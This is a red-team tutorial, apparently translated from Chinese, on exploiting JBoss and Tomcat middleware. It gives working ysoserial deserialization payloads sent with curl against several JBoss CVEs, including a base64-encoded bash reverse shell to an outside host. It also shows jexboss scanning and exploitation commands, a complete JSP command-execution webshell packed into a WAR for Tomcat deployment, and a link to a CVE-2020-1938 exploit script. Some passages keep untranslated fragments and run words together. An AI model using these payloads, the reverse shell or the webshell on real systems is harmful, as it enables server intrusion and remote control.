This article introduces the exploitation surface related to middleware

Common middleware includes Jboss, Weblogic, Websphere, Tomcat, Apache, Nginx, IIS

Jboss

Since the probability of encountering Jboss in red-blue confrontation is relatively high, let's record the exploitation surface of Jboss

JBoss is an open-source application server based on J2EE, following the LGPL license, which can be used for free in any commercial application; JBoss is also an EJB container and server that supports EJB 1.1, EJB 2.0, and EJB3 specifications.

JBoss deserialization (CVE-2017-12149)

Vulnerability description

This vulnerability is a Java deserialization error type, existing in the ReadOnlyAccessFilter filter of the HttpInvoker component in Jboss. This filter attempts to deserialize data from the client without any security checks, leading to the vulnerability.

Affected Versions:

Jboss AS 5.x
Jboss AS 6.x

Environment Setup:

Here we use the vulhub environment

svn checkout https://github.com/vulhub/vulhub/trunk/jboss/CVE-2017-12149
cd CVE-2017-12149
docker-compose up -d

Access port 8080

Vulnerability reproduction

Access route/invoker/readonly, see the 500 status code

Use ysoserial to generate serialized data to poc.ser

# Base64 encoded反弹shell command
echo "bash -i &>/dev/tcp/xxx/xxx <&1"|base64
YmFzaCAtaSAmPi9kZXYvdGNwLzE4Mi4xNjAuOS4zNS85OTk5IDwmMQo=
Use ysoserial's CC5 chain to generate serialized code
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSAmPi9kZXYvdGNwLzE4Mi4xNjAuOS4zNS85OTk5IDwmMQo=}|{base64,-d}|{bash,-i}" > poc.ser

Pass serialized data to attack

curl http://192.168.119.157:8080/invoker/readonly --data-binary @poc.ser

At this time, check the vps, successfully intercepted the反弹shell

Vulnerability Analysis

This vulnerability exists in the ReadOnlyAccessFilter of the http invoker componentdoFilter. As shown in the following figure:

The code in the method deserializes the data stream from the client (request.getInputStream()) without any security checks (as shown by the red arrow), leading to a deserialization vulnerability.

JBossMQ Deserialization (CVE-2017-7504)

Vulnerability Description:

Red Hat JBoss Application Server is an open-source JavaEE application server based on Java. In JbossMQ implementation processes of JMS over HTTP Invocation Layer in JbossMQ's HTTPServerILServlet.java file in Jboss AS 4.x and earlier versions, there is a deserialization vulnerability that allows remote attackers to execute arbitrary code by using specially crafted serialized data.

Affected Versions:

Jboss 4.x

Environment Setup

svn checkout https://github.com/vulhub/vulhub/trunk/jboss/CVE-2017-7504
cd CVE-2017-7504
docker-compose up -d

This vulnerability appears in/jbossmq-httpil/HTTPServerILServletIn the request, we use the ysoserial eCommonsCollections5 exploit chain to reproduce. Generate Payload:

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser

We will send the content of the 1.ser file as the POST Body:

curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser

Executedocker-compose exec jboss bashEnter the container, visible/tmp/successSuccessfully created.

JBoss JMXInvokerServlet Deserialization Vulnerability

Vulnerability Description:

This is a classic JBoss deserialization vulnerability, JBoss in/invoker/JMXInvokerServletThe request reads the object passed by the user, and then we execute arbitrary code by using the Gadget in Apache Commons Collections.

Environment Setup:

Refer to CVE-2017-7504

Vulnerability Exploitation:

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
curl http://your-ip:8080/invoker/JMXInvokerServlet --data-binary @1.ser

Exploitation Tool

jexboss

Project Address:https://github.com/joaomatosf/jexboss

Project Introduction:

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

Abbreviation: JBoss Application Server Attack and Other Java Platform Attack Tool

Windows Installation:

PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

Attack Component:

Scanning Mode:

python jexboss.py -mode auto-scan -network 192.168.119.0/24 -ports 8080 -results results.txt

Targeted Exploitation:

python2 jexboss.py -u http://192.168.119.157:8080/

Reverse Shell Successful

JbossScan

Project Address:

https://github.com/GGyao/jbossScan

Project Introduction:

Scan Jboss Vulnerability

Put the url intarget.txtin

python .\jbossScan.py

JBoss vulnerability detection tool by lab

Tomcat

Tomcat deploy war

Prerequisites: Can access Tomcat management background

Prepare malicious webshell

<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>horse</title>
</head>

<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>

</html>

Pack into a war package

jar -cvf [war package name].war packing directory
jar -cvf test.war * 

Upload test.war by deploying the war package

The webshell can be accessed under the corresponding directory of the website

Tomcat arbitrary file read (cve-2020-1938)

Prerequisites:

• Apache Tomcat 9.0.0.M1 to 9.0.0.30

• Apache Tomcat 8.5.0 to 8.5.50

• Apache Tomcat 7.0.0 to 7.0.99

Use script:

https://github.com/zhzyker/exphub/blob/master/tomcat/cve-2020-1938_exp.py